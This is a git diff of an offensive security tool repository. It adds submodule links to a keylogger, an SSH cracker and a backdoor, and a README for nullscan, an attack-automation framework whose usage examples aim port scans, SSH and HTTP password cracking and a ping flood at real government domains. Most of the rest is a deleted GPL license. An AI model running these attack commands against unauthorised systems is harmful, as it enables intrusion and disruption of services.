diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..b7aafa9 --- /dev/null +++ b/.gitignore @@ -0,0 +1,15 @@ +.swp +.swn +.swo +.key +.DS_Store +.git +.pyc +__pycache__ +id_rsa +id_dsa +passwd +shadow +.bash_history +.zsh_history +.zhistory diff --git a/.gitmodules b/.gitmodules new file mode 100644 index 0000000..178ec3a --- /dev/null +++ b/.gitmodules @@ -0,0 +1,30 @@ +[submodule "keylogger/ixkeylog/source"] + path = keylogger/ixkeylog/source + url = https://github.com/dorneanu/ixkeylog +[submodule "misc/netgrafio/source"] + path = misc/netgrafio/source + url = https://github.com/dorneanu/netgrafio +[submodule "scanner/smalisca/source"] + path = scanner/smalisca/source + url = https://github.com/dorneanu/smalisca +[submodule "scanner/lulzbuster/source"] + path = scanner/lulzbuster/source + url = https://github.com/noptrix/lulzbuster +[submodule "automation/nullscan/source"] + path = automation/nullscan/source + url = https://github.com/noptrix/nullscan +[submodule "scanner/httpgrep/source"] + path = scanner/httpgrep/source + url = https://github.com/noptrix/httpgrep +[submodule "cracker/sshprank/source"] + path = cracker/sshprank/source + url = https://github.com/noptrix/sshprank +[submodule "misc/ipcountry/source"] + path = misc/ipcountry/source + url = https://github.com/noptrix/ipcountry +[submodule "scanner/dnsspider/source"] + path = scanner/dnsspider/source + url = https://github.com/noptrix/dnsspider +[submodule "backdoor/fbkit/source"] + path = backdoor/fbkit/source + url = https://github.com/noptrix/fbkit diff --git a/README.md b/README.md index aed7cfc..ff6d7cd 100644 --- a/README.md +++ b/README.md @@ -1,5 +1,4 @@ -About -===== +# About This section offers a selection of our fully featured security and hacking tools. We also provide some exploits, proof of concept code, shellcodes and snippets. That means some tools are not tested and may not have the feature set. @@ -7,9 +6,8 @@ That means some tools are not tested and may not have the feature set. If you find some bugs or if you have any questions, ideas or criticism regarding to this section, feel free to message us. -Disclaimer -========== -We hereby emphasize, that the hacking related stuff on -[nullsecurity.net](http://nullsecurity.net) is only for education purposes. +# Disclaimer +We hereby emphasize, that the hacking related stuff +is only for education purposes. We are not responsible for any damages. You are responsible for your own actions. diff --git a/automation/README.md b/automation/README.md index 7145f5c..bc2a5d1 100644 --- a/automation/README.md +++ b/automation/README.md @@ -1,5 +1,4 @@ -About -===== +# About This section includes automation tools and wrapper scripts for well-known and public security tools to make your life easier. You can adjust the scripts fast and easily according to your own needs. Mostly written in bourne shell. @@ -7,8 +6,7 @@ and easily according to your own needs. Mostly written in bourne shell. If you find some bugs or if you have any questions, ideas or criticism regarding to this section, feel free to message us. -Disclaimer -========== +# Disclaimer We hereby emphasize, that the hacking related stuff on [nullsecurity.net](http://nullsecurity.net) is only for education purposes. We are not responsible for any damages. You are responsible for your own diff --git a/automation/nullscan/README.md b/automation/nullscan/README.md new file mode 100644 index 0000000..d9447c7 --- /dev/null +++ b/automation/nullscan/README.md @@ -0,0 +1,112 @@ +# Description +A modular framework designed to chain and automate security tests. It parses +target definitions from the command line and runs corresponding modules and +their nullscan-tools afterwards. It can also take hosts and start nmap first in +order to perform a basic portscan and run the modules afterwards. Also, nullscan +can parse a given nmap logfile for open tcp and udp ports and again run the +modules afterwards. All results will be logged in specified directories with a +clean structure and a HTML report can subsequently be generated. + +This code is dedicated to my friend Zeljko (R.I.P.), who passed away, +2nd Dec 2012. + +# Usage + +``` +[ hacker@blackarch ~ ]$ nullscan -H + ____ + ____ __ __/ / /_____________ _____ + / __ \/ / / / / / ___/ ___/ __ `/ __ \ + / / / / /_/ / / (__ ) /__/ /_/ / / / / +/_/ /_/\__,_/_/_/____/\___/\__,_/_/ /_/ + + --==[ by nullsecurity.net ]==-- + +usage + + nullscan [options] | + +modes + + -t - hosts to scan via nmap and then attack - ? for info + -u - targets to attack directly via URIs - ? for info + -l - parse nmap xml logfile and attack hosts on open ports + +options + + -o - extra options for modes - ? for info + -i - include modules (default: all) - ? for info + -I - include tools (default: all) - ? for info + -x - exclude modules (default: see nullscan.cfg) - ? for info + -X - exclude tools (default: see nullscan.cfg) - ? for info + -T - num workers for parallel target checks (default: 15) + -M - num workers to run parallel modules (default: 10) + -P - num workers to run parallel tools (default: 15) + -k - num seconds for tool (global) timeout (default: 0.0) + -r - generate an html report + -R - work, log and report dir (default: pwd + date) + -c - config file (default: /etc/nullscan.conf) + -v - verbose mode (default: false) + -d - debug mode (default: false) + +misc + + -C - check for missing tools (recommended) + -p - print tools and exit - ? for info + -m - create and add a new module - ? for info + -a - add tool to existing module - ? for info + -V - print version of nullscan and exit + -H - print this help and exit + +examples + + -t 192.168.0.0/24 -i tcp=ssh,http -r -I hydra_ssh,crack_http_auth + + -u 'tcp://nsa.gov:80=http,22=ssh;udp://foo.bar:1337; + http://fbi.gov,https://cia.gov;mail://foo@bar.baz; + person://justin bieber,noptrix;lan://eth0,tap0;wifi://wlan0' + -o 'user=root;plists=/tmp/pwds.txt;rhost=192.168.0.1; + sport=1337;dirsearch_web=-o my -p "own opts" -c 1 -f 4;' + + -n /tmp/scanned.xml -i 'host=icmp;tcp=default' -r + + -l hosts.txt -X sqlmap,wpscan -v -o 'httping_web=-p cia.gov; + rpcdump_udp=-f foo -b bar;nmap=-sT,-n,-p-;' + + -p 'tcp=ssh,http;host=zonetransfer;udp' + + -m 'icmp/ping ping_flood ping -f -s 9999' + + -a 'tcp/ssh crack_ssh sshcracker -c arg -f arg' +``` + +# Example + +[![asciicast](https://asciinema.org/a/kUNVbUEIde0e6vtsKiFi5neXb.png)](https://asciinema.org/a/kUNVbUEIde0e6vtsKiFi5neXb) + +# Installation + +Run `setup.sh`. Install needed python modules afterwards using `pip install -r docs/requirements.txt`. + +# Author + +noptrix + +# Notes + +- Please check the manpage from docs/nullscan.1 +- Use '?' option-value for any cmdline options. It gives you information for usage and examples. +- clean code; real project +- nullscan is already packaged and available for [BlackArch Linux](https://www.blackarch.org/) +- My master-branches are always dev-branches; use releases for stable versions. +- All of my public stuff you find are officially announced and published via [nullsecurity.net](https://www.nullsecurity.net). + +# License + +Check docs/LICENSE. + +# Disclaimer +We hereby emphasize, that the hacking related stuff found on +[nullsecurity.net](http://nullsecurity.net/) are only for education purposes. +We are not responsible for any damages. You are responsible for your own +actions. diff --git a/automation/nullscan/release/nullscan-1.0.1.tar.gz b/automation/nullscan/release/nullscan-1.0.1.tar.gz new file mode 100644 index 0000000..8c463bb Binary files /dev/null and b/automation/nullscan/release/nullscan-1.0.1.tar.gz differ diff --git a/automation/nullscan/source b/automation/nullscan/source new file mode 160000 index 0000000..ef788fe --- /dev/null +++ b/automation/nullscan/source @@ -0,0 +1 @@ +Subproject commit ef788feeb0c63bbbc5a6ca89f2304f7862a7b4fa diff --git a/automation/sn00p/README.md b/automation/sn00p/README.md deleted file mode 100644 index c749624..0000000 --- a/automation/sn00p/README.md +++ /dev/null @@ -1,22 +0,0 @@ -Description -=========== -A modular tool written in bourne shell and designed to chain and automate -security tools and tests. It parses target definitions from the command line and -runs corresponding modules afterwards. sn00p can also parse a given nmap logfile -for open tcp and udp ports. All results will be logged in specified directories -and a report can subsequently be generated. - -MD5 -=== -1c43f2013de4503121385882a2201b27 - -Author -====== -noptrix - -Disclaimer -========== -We hereby emphasize, that the hacking related stuff on -[nullsecurity.net](http://nullsecurity.net) is only for education purposes. -We are not responsible for any damages. You are responsible for your own -actions. diff --git a/automation/sn00p/release/sn00p-0.8.tar.gz b/automation/sn00p/release/sn00p-0.8.tar.gz deleted file mode 100644 index 01314f4..0000000 Binary files a/automation/sn00p/release/sn00p-0.8.tar.gz and /dev/null differ diff --git a/automation/sn00p/source/README b/automation/sn00p/source/README deleted file mode 120000 index a90f4af..0000000 --- a/automation/sn00p/source/README +++ /dev/null @@ -1 +0,0 @@ -docs/README \ No newline at end of file diff --git a/automation/sn00p/source/docs/AUTHORS b/automation/sn00p/source/docs/AUTHORS deleted file mode 100644 index 94740d1..0000000 --- a/automation/sn00p/source/docs/AUTHORS +++ /dev/null @@ -1 +0,0 @@ -noptrix[at]nullsecurity.net - http://www.nullsecurity.net/ diff --git a/automation/sn00p/source/docs/CHANGELOG b/automation/sn00p/source/docs/CHANGELOG deleted file mode 100644 index c371380..0000000 --- a/automation/sn00p/source/docs/CHANGELOG +++ /dev/null @@ -1 +0,0 @@ -See docs/TODO file for changes and todo list. diff --git a/automation/sn00p/source/docs/COPYING b/automation/sn00p/source/docs/COPYING deleted file mode 100644 index 94a9ed0..0000000 --- a/automation/sn00p/source/docs/COPYING +++ /dev/null @@ -1,674 +0,0 @@ - GNU GENERAL PUBLIC LICENSE - Version 3, 29 June 2007 - - Copyright (C) 2007 Free Software Foundation, Inc. - Everyone is permitted to copy and distribute verbatim copies - of this license document, but changing it is not allowed. - - Preamble - - The GNU General Public License is a free, copyleft license for -software and other kinds of works. - - The licenses for most software and other practical works are designed -to take away your freedom to share and change the works. By contrast, -the GNU General Public License is intended to guarantee your freedom to -share and change all versions of a program--to make sure it remains free -software for all its users. We, the Free Software Foundation, use the -GNU General Public License for most of our software; it applies also to -any other work released this way by its authors. You can apply it to -your programs, too. - - When we speak of free software, we are referring to freedom, not -price. Our General Public Licenses are designed to make sure that you -have the freedom to distribute copies of free software (and charge for -them if you wish), that you receive source code or can get it if you -want it, that you can change the software or use pieces of it in new -free programs, and that you know you can do these things. - - To protect your rights, we need to prevent others from denying you -these rights or asking you to surrender the rights. Therefore, you have -certain responsibilities if you distribute copies of the software, or if -you modify it: responsibilities to respect the freedom of others. - - For example, if you distribute copies of such a program, whether -gratis or for a fee, you must pass on to the recipients the same -freedoms that you received. You must make sure that they, too, receive -or can get the source code. And you must show them these terms so they -know their rights. - - Developers that use the GNU GPL protect your rights with two steps: -(1) assert copyright on the software, and (2) offer you this License -giving you legal permission to copy, distribute and/or modify it. - - For the developers' and authors' protection, the GPL clearly explains -that there is no warranty for this free software. For both users' and -authors' sake, the GPL requires that modified versions be marked as -changed, so that their problems will not be attributed erroneously to -authors of previous versions. - - Some devices are designed to deny users access to install or run -modified versions of the software inside them, although the manufacturer -can do so. This is fundamentally incompatible with the aim of -protecting users' freedom to change the software. The systematic -pattern of such abuse occurs in the area of products for individuals to -use, which is precisely where it is most unacceptable. Therefore, we -have designed this version of the GPL to prohibit the practice for those -products. If such problems arise substantially in other domains, we -stand ready to extend this provision to those domains in future versions -of the GPL, as needed to protect the freedom of users. - - Finally, every program is threatened constantly by software patents. -States should not allow patents to restrict development and use of -software on general-purpose computers, but in those that do, we wish to -avoid the special danger that patents applied to a free program could -make it effectively proprietary. To prevent this, the GPL assures that -patents cannot be used to render the program non-free. - - The precise terms and conditions for copying, distribution and -modification follow. - - TERMS AND CONDITIONS - - 0. Definitions. - - "This License" refers to version 3 of the GNU General Public License. - - "Copyright" also means copyright-like laws that apply to other kinds of -works, such as semiconductor masks. - - "The Program" refers to any copyrightable work licensed under this -License. Each licensee is addressed as "you". "Licensees" and -"recipients" may be individuals or organizations. - - To "modify" a work means to copy from or adapt all or part of the work -in a fashion requiring copyright permission, other than the making of an -exact copy. The resulting work is called a "modified version" of the -earlier work or a work "based on" the earlier work. - - A "covered work" means either the unmodified Program or a work based -on the Program. - - To "propagate" a work means to do anything with it that, without -permission, would make you directly or secondarily liable for -infringement under applicable copyright law, except executing it on a -computer or modifying a private copy. Propagation includes copying, -distribution (with or without modification), making available to the -public, and in some countries other activities as well. - - To "convey" a work means any kind of propagation that enables other -parties to make or receive copies. Mere interaction with a user through -a computer network, with no transfer of a copy, is not conveying. - - An interactive user interface displays "Appropriate Legal Notices" -to the extent that it includes a convenient and prominently visible -feature that (1) displays an appropriate copyright notice, and (2) -tells the user that there is no warranty for the work (except to the -extent that warranties are provided), that licensees may convey the -work under this License, and how to view a copy of this License. If -the interface presents a list of user commands or options, such as a -menu, a prominent item in the list meets this criterion. - - 1. Source Code. - - The "source code" for a work means the preferred form of the work -for making modifications to it. "Object code" means any non-source -form of a work. - - A "Standard Interface" means an interface that either is an official -standard defined by a recognized standards body, or, in the case of -interfaces specified for a particular programming language, one that -is widely used among developers working in that language. - - The "System Libraries" of an executable work include anything, other -than the work as a whole, that (a) is included in the normal form of -packaging a Major Component, but which is not part of that Major -Component, and (b) serves only to enable use of the work with that -Major Component, or to implement a Standard Interface for which an -implementation is available to the public in source code form. A -"Major Component", in this context, means a major essential component -(kernel, window system, and so on) of the specific operating system -(if any) on which the executable work runs, or a compiler used to -produce the work, or an object code interpreter used to run it. - - The "Corresponding Source" for a work in object code form means all -the source code needed to generate, install, and (for an executable -work) run the object code and to modify the work, including scripts to -control those activities. However, it does not include the work's -System Libraries, or general-purpose tools or generally available free -programs which are used unmodified in performing those activities but -which are not part of the work. For example, Corresponding Source -includes interface definition files associated with source files for -the work, and the source code for shared libraries and dynamically -linked subprograms that the work is specifically designed to require, -such as by intimate data communication or control flow between those -subprograms and other parts of the work. - - The Corresponding Source need not include anything that users -can regenerate automatically from other parts of the Corresponding -Source. - - The Corresponding Source for a work in source code form is that -same work. - - 2. Basic Permissions. - - All rights granted under this License are granted for the term of -copyright on the Program, and are irrevocable provided the stated -conditions are met. This License explicitly affirms your unlimited -permission to run the unmodified Program. The output from running a -covered work is covered by this License only if the output, given its -content, constitutes a covered work. This License acknowledges your -rights of fair use or other equivalent, as provided by copyright law. - - You may make, run and propagate covered works that you do not -convey, without conditions so long as your license otherwise remains -in force. You may convey covered works to others for the sole purpose -of having them make modifications exclusively for you, or provide you -with facilities for running those works, provided that you comply with -the terms of this License in conveying all material for which you do -not control copyright. Those thus making or running the covered works -for you must do so exclusively on your behalf, under your direction -and control, on terms that prohibit them from making any copies of -your copyrighted material outside their relationship with you. - - Conveying under any other circumstances is permitted solely under -the conditions stated below. Sublicensing is not allowed; section 10 -makes it unnecessary. - - 3. Protecting Users' Legal Rights From Anti-Circumvention Law. - - No covered work shall be deemed part of an effective technological -measure under any applicable law fulfilling obligations under article -11 of the WIPO copyright treaty adopted on 20 December 1996, or -similar laws prohibiting or restricting circumvention of such -measures. - - When you convey a covered work, you waive any legal power to forbid -circumvention of technological measures to the extent such circumvention -is effected by exercising rights under this License with respect to -the covered work, and you disclaim any intention to limit operation or -modification of the work as a means of enforcing, against the work's -users, your or third parties' legal rights to forbid circumvention of -technological measures. - - 4. Conveying Verbatim Copies. - - You may convey verbatim copies of the Program's source code as you -receive it, in any medium, provided that you conspicuously and -appropriately publish on each copy an appropriate copyright notice; -keep intact all notices stating that this License and any -non-permissive terms added in accord with section 7 apply to the code; -keep intact all notices of the absence of any warranty; and give all -recipients a copy of this License along with the Program. - - You may charge any price or no price for each copy that you convey, -and you may offer support or warranty protection for a fee. - - 5. Conveying Modified Source Versions. - - You may convey a work based on the Program, or the modifications to -produce it from the Program, in the form of source code under the -terms of section 4, provided that you also meet all of these conditions: - - a) The work must carry prominent notices stating that you modified - it, and giving a relevant date. - - b) The work must carry prominent notices stating that it is - released under this License and any conditions added under section - 7. This requirement modifies the requirement in section 4 to - "keep intact all notices". - - c) You must license the entire work, as a whole, under this - License to anyone who comes into possession of a copy. This - License will therefore apply, along with any applicable section 7 - additional terms, to the whole of the work, and all its parts, - regardless of how they are packaged. This License gives no - permission to license the work in any other way, but it does not - invalidate such permission if you have separately received it. - - d) If the work has interactive user interfaces, each must display - Appropriate Legal Notices; however, if the Program has interactive - interfaces that do not display Appropriate Legal Notices, your - work need not make them do so. - - A compilation of a covered work with other separate and independent -works, which are not by their nature extensions of the covered work, -and which are not combined with it such as to form a larger program, -in or on a volume of a storage or distribution medium, is called an -"aggregate" if the compilation and its resulting copyright are not -used to limit the access or legal rights of the compilation's users -beyond what the individual works permit. Inclusion of a covered work -in an aggregate does not cause this License to apply to the other -parts of the aggregate. - - 6. Conveying Non-Source Forms. - - You may convey a covered work in object code form under the terms -of sections 4 and 5, provided that you also convey the -machine-readable Corresponding Source under the terms of this License, -in one of these ways: - - a) Convey the object code in, or embodied in, a physical product - (including a physical distribution medium), accompanied by the - Corresponding Source fixed on a durable physical medium - customarily used for software interchange. - - b) Convey the object code in, or embodied in, a physical product - (including a physical distribution medium), accompanied by a - written offer, valid for at least three years and valid for as - long as you offer spare parts or customer support for that product - model, to give anyone who possesses the object code either (1) a - copy of the Corresponding Source for all the software in the - product that is covered by this License, on a durable physical - medium customarily used for software interchange, for a price no - more than your reasonable cost of physically performing this - conveying of source, or (2) access to copy the - Corresponding Source from a network server at no charge. - - c) Convey individual copies of the object code with a copy of the - written offer to provide the Corresponding Source. This - alternative is allowed only occasionally and noncommercially, and - only if you received the object code with such an offer, in accord - with subsection 6b. - - d) Convey the object code by offering access from a designated - place (gratis or for a charge), and offer equivalent access to the - Corresponding Source in the same way through the same place at no - further charge. You need not require recipients to copy the - Corresponding Source along with the object code. If the place to - copy the object code is a network server, the Corresponding Source - may be on a different server (operated by you or a third party) - that supports equivalent copying facilities, provided you maintain - clear directions next to the object code saying where to find the - Corresponding Source. Regardless of what server hosts the - Corresponding Source, you remain obligated to ensure that it is - available for as long as needed to satisfy these requirements. - - e) Convey the object code using peer-to-peer transmission, provided - you inform other peers where the object code and Corresponding - Source of the work are being offered to the general public at no - charge under subsection 6d. - - A separable portion of the object code, whose source code is excluded -from the Corresponding Source as a System Library, need not be -included in conveying the object code work. - - A "User Product" is either (1) a "consumer product", which means any -tangible personal property which is normally used for personal, family, -or household purposes, or (2) anything designed or sold for incorporation -into a dwelling. In determining whether a product is a consumer product, -doubtful cases shall be resolved in favor of coverage. For a particular -product received by a particular user, "normally used" refers to a -typical or common use of that class of product, regardless of the status -of the particular user or of the way in which the particular user -actually uses, or expects or is expected to use, the product. A product -is a consumer product regardless of whether the product has substantial -commercial, industrial or non-consumer uses, unless such uses represent -the only significant mode of use of the product. - - "Installation Information" for a User Product means any methods, -procedures, authorization keys, or other information required to install -and execute modified versions of a covered work in that User Product from -a modified version of its Corresponding Source. The information must -suffice to ensure that the continued functioning of the modified object -code is in no case prevented or interfered with solely because -modification has been made. - - If you convey an object code work under this section in, or with, or -specifically for use in, a User Product, and the conveying occurs as -part of a transaction in which the right of possession and use of the -User Product is transferred to the recipient in perpetuity or for a -fixed term (regardless of how the transaction is characterized), the -Corresponding Source conveyed under this section must be accompanied -by the Installation Information. But this requirement does not apply -if neither you nor any third party retains the ability to install -modified object code on the User Product (for example, the work has -been installed in ROM). - - The requirement to provide Installation Information does not include a -requirement to continue to provide support service, warranty, or updates -for a work that has been modified or installed by the recipient, or for -the User Product in which it has been modified or installed. Access to a -network may be denied when the modification itself materially and -adversely affects the operation of the network or violates the rules and -protocols for communication across the network. - - Corresponding Source conveyed, and Installation Information provided, -in accord with this section must be in a format that is publicly -documented (and with an implementation available to the public in -source code form), and must require no special password or key for -unpacking, reading or copying. - - 7. Additional Terms. - - "Additional permissions" are terms that supplement the terms of this -License by making exceptions from one or more of its conditions. -Additional permissions that are applicable to the entire Program shall -be treated as though they were included in this License, to the extent -that they are valid under applicable law. If additional permissions -apply only to part of the Program, that part may be used separately -under those permissions, but the entire Program remains governed by -this License without regard to the additional permissions. - - When you convey a copy of a covered work, you may at your option -remove any additional permissions from that copy, or from any part of -it. (Additional permissions may be written to require their own -removal in certain cases when you modify the work.) You may place -additional permissions on material, added by you to a covered work, -for which you have or can give appropriate copyright permission. - - Notwithstanding any other provision of this License, for material you -add to a covered work, you may (if authorized by the copyright holders of -that material) supplement the terms of this License with terms: - - a) Disclaiming warranty or limiting liability differently from the - terms of sections 15 and 16 of this License; or - - b) Requiring preservation of specified reasonable legal notices or - author attributions in that material or in the Appropriate Legal - Notices displayed by works containing it; or - - c) Prohibiting misrepresentation of the origin of that material, or - requiring that modified versions of such material be marked in - reasonable ways as different from the original version; or - - d) Limiting the use for publicity purposes of names of licensors or - authors of the material; or - - e) Declining to grant rights under trademark law for use of some - trade names, trademarks, or service marks; or - - f) Requiring indemnification of licensors and authors of that - material by anyone who conveys the material (or modified versions of - it) with contractual assumptions of liability to the recipient, for - any liability that these contractual assumptions directly impose on - those licensors and authors. - - All other non-permissive additional terms are considered "further -restrictions" within the meaning of section 10. If the Program as you -received it, or any part of it, contains a notice stating that it is -governed by this License along with a term that is a further -restriction, you may remove that term. If a license document contains -a further restriction but permits relicensing or conveying under this -License, you may add to a covered work material governed by the terms -of that license document, provided that the further restriction does -not survive such relicensing or conveying. - - If you add terms to a covered work in accord with this section, you -must place, in the relevant source files, a statement of the -additional terms that apply to those files, or a notice indicating -where to find the applicable terms. - - Additional terms, permissive or non-permissive, may be stated in the -form of a separately written license, or stated as exceptions; -the above requirements apply either way. - - 8. Termination. - - You may not propagate or modify a covered work except as expressly -provided under this License. Any attempt otherwise to propagate or -modify it is void, and will automatically terminate your rights under -this License (including any patent licenses granted under the third -paragraph of section 11). - - However, if you cease all violation of this License, then your -license from a particular copyright holder is reinstated (a) -provisionally, unless and until the copyright holder explicitly and -finally terminates your license, and (b) permanently, if the copyright -holder fails to notify you of the violation by some reasonable means -prior to 60 days after the cessation. - - Moreover, your license from a particular copyright holder is -reinstated permanently if the copyright holder notifies you of the -violation by some reasonable means, this is the first time you have -received notice of violation of this License (for any work) from that -copyright holder, and you cure the violation prior to 30 days after -your receipt of the notice. - - Termination of your rights under this section does not terminate the -licenses of parties who have received copies or rights from you under -this License. If your rights have been terminated and not permanently -reinstated, you do not qualify to receive new licenses for the same -material under section 10. - - 9. Acceptance Not Required for Having Copies. - - You are not required to accept this License in order to receive or -run a copy of the Program. Ancillary propagation of a covered work -occurring solely as a consequence of using peer-to-peer transmission -to receive a copy likewise does not require acceptance. However, -nothing other than this License grants you permission to propagate or -modify any covered work. These actions infringe copyright if you do -not accept this License. Therefore, by modifying or propagating a -covered work, you indicate your acceptance of this License to do so. - - 10. Automatic Licensing of Downstream Recipients. - - Each time you convey a covered work, the recipient automatically -receives a license from the original licensors, to run, modify and -propagate that work, subject to this License. You are not responsible -for enforcing compliance by third parties with this License. - - An "entity transaction" is a transaction transferring control of an -organization, or substantially all assets of one, or subdividing an -organization, or merging organizations. If propagation of a covered -work results from an entity transaction, each party to that -transaction who receives a copy of the work also receives whatever -licenses to the work the party's predecessor in interest had or could -give under the previous paragraph, plus a right to possession of the -Corresponding Source of the work from the predecessor in interest, if -the predecessor has it or can get it with reasonable efforts. - - You may not impose any further restrictions on the exercise of the -rights granted or affirmed under this License. For example, you may -not impose a license fee, royalty, or other charge for exercise of -rights granted under this License, and you may not initiate litigation -(including a cross-claim or counterclaim in a lawsuit) alleging that -any patent claim is infringed by making, using, selling, offering for -sale, or importing the Program or any portion of it. - - 11. Patents. - - A "contributor" is a copyright holder who authorizes use under this -License of the Program or a work on which the Program is based. The -work thus licensed is called the contributor's "contributor version". - - A contributor's "essential patent claims" are all patent claims -owned or controlled by the contributor, whether already acquired or -hereafter acquired, that would be infringed by some manner, permitted -by this License, of making, using, or selling its contributor version, -but do not include claims that would be infringed only as a -consequence of further modification of the contributor version. For -purposes of this definition, "control" includes the right to grant -patent sublicenses in a manner consistent with the requirements of -this License. - - Each contributor grants you a non-exclusive, worldwide, royalty-free -patent license under the contributor's essential patent claims, to -make, use, sell, offer for sale, import and otherwise run, modify and -propagate the contents of its contributor version. - - In the following three paragraphs, a "patent license" is any express -agreement or commitment, however denominated, not to enforce a patent -(such as an express permission to practice a patent or covenant not to -sue for patent infringement). To "grant" such a patent license to a -party means to make such an agreement or commitment not to enforce a -patent against the party. - - If you convey a covered work, knowingly relying on a patent license, -and the Corresponding Source of the work is not available for anyone -to copy, free of charge and under the terms of this License, through a -publicly available network server or other readily accessible means, -then you must either (1) cause the Corresponding Source to be so -available, or (2) arrange to deprive yourself of the benefit of the -patent license for this particular work, or (3) arrange, in a manner -consistent with the requirements of this License, to extend the patent -license to downstream recipients. "Knowingly relying" means you have -actual knowledge that, but for the patent license, your conveying the -covered work in a country, or your recipient's use of the covered work -in a country, would infringe one or more identifiable patents in that -country that you have reason to believe are valid. - - If, pursuant to or in connection with a single transaction or -arrangement, you convey, or propagate by procuring conveyance of, a -covered work, and grant a patent license to some of the parties -receiving the covered work authorizing them to use, propagate, modify -or convey a specific copy of the covered work, then the patent license -you grant is automatically extended to all recipients of the covered -work and works based on it. - - A patent license is "discriminatory" if it does not include within -the scope of its coverage, prohibits the exercise of, or is -conditioned on the non-exercise of one or more of the rights that are -specifically granted under this License. You may not convey a covered -work if you are a party to an arrangement with a third party that is -in the business of distributing software, under which you make payment -to the third party based on the extent of your activity of conveying -the work, and under which the third party grants, to any of the -parties who would receive the covered work from you, a discriminatory -patent license (a) in connection with copies of the covered work -conveyed by you (or copies made from those copies), or (b) primarily -for and in connection with specific products or compilations that -contain the covered work, unless you entered into that arrangement, -or that patent license was granted, prior to 28 March 2007. - - Nothing in this License shall be construed as excluding or limiting -any implied license or other defenses to infringement that may -otherwise be available to you under applicable patent law. - - 12. No Surrender of Others' Freedom. - - If conditions are imposed on you (whether by court order, agreement or -otherwise) that contradict the conditions of this License, they do not -excuse you from the conditions of this License. If you cannot convey a -covered work so as to satisfy simultaneously your obligations under this -License and any other pertinent obligations, then as a consequence you may -not convey it at all. For example, if you agree to terms that obligate you -to collect a royalty for further conveying from those to whom you convey -the Program, the only way you could satisfy both those terms and this -License would be to refrain entirely from conveying the Program. - - 13. Use with the GNU Affero General Public License. - - Notwithstanding any other provision of this License, you have -permission to link or combine any covered work with a work licensed -under version 3 of the GNU Affero General Public License into a single -combined work, and to convey the resulting work. The terms of this -License will continue to apply to the part which is the covered work, -but the special requirements of the GNU Affero General Public License, -section 13, concerning interaction through a network will apply to the -combination as such. - - 14. Revised Versions of this License. - - The Free Software Foundation may publish revised and/or new versions of -the GNU General Public License from time to time. Such new versions will -be similar in spirit to the present version, but may differ in detail to -address new problems or concerns. - - Each version is given a distinguishing version number. If the -Program specifies that a certain numbered version of the GNU General -Public License "or any later version" applies to it, you have the -option of following the terms and conditions either of that numbered -version or of any later version published by the Free Software -Foundation. If the Program does not specify a version number of the -GNU General Public License, you may choose any version ever published -by the Free Software Foundation. - - If the Program specifies that a proxy can decide which future -versions of the GNU General Public License can be used, that proxy's -public statement of acceptance of a version permanently authorizes you -to choose that version for the Program. - - Later license versions may give you additional or different -permissions. However, no additional obligations are imposed on any -author or copyright holder as a result of your choosing to follow a -later version. - - 15. Disclaimer of Warranty. - - THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY -APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT -HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY -OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, -THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR -PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM -IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF -ALL NECESSARY SERVICING, REPAIR OR CORRECTION. - - 16. Limitation of Liability. - - IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING -WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS -THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY -GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE -USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF -DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD -PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), -EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF -SUCH DAMAGES. - - 17. Interpretation of Sections 15 and 16. - - If the disclaimer of warranty and limitation of liability provided -above cannot be given local legal effect according to their terms, -reviewing courts shall apply local law that most closely approximates -an absolute waiver of all civil liability in connection with the -Program, unless a warranty or assumption of liability accompanies a -copy of the Program in return for a fee. - - END OF TERMS AND CONDITIONS - - How to Apply These Terms to Your New Programs - - If you develop a new program, and you want it to be of the greatest -possible use to the public, the best way to achieve this is to make it -free software which everyone can redistribute and change under these terms. - - To do so, attach the following notices to the program. It is safest -to attach them to the start of each source file to most effectively -state the exclusion of warranty; and each file should have at least -the "copyright" line and a pointer to where the full notice is found. - - - Copyright (C) - - This program is free software: you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation, either version 3 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program. If not, see . - -Also add information on how to contact you by electronic and paper mail. - - If the program does terminal interaction, make it output a short -notice like this when it starts in an interactive mode: - - Copyright (C) - This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. - This is free software, and you are welcome to redistribute it - under certain conditions; type `show c' for details. - -The hypothetical commands `show w' and `show c' should show the appropriate -parts of the General Public License. Of course, your program's commands -might be different; for a GUI interface, you would use an "about box". - - You should also get your employer (if you work as a programmer) or school, -if any, to sign a "copyright disclaimer" for the program, if necessary. -For more information on this, and how to apply and follow the GNU GPL, see -. - - The GNU General Public License does not permit incorporating your program -into proprietary programs. If your program is a subroutine library, you -may consider it more useful to permit linking proprietary applications with -the library. If this is what you want to do, use the GNU Lesser General -Public License instead of this License. But first, please read -. diff --git a/automation/sn00p/source/docs/DESCR b/automation/sn00p/source/docs/DESCR deleted file mode 100644 index d99d1d7..0000000 --- a/automation/sn00p/source/docs/DESCR +++ /dev/null 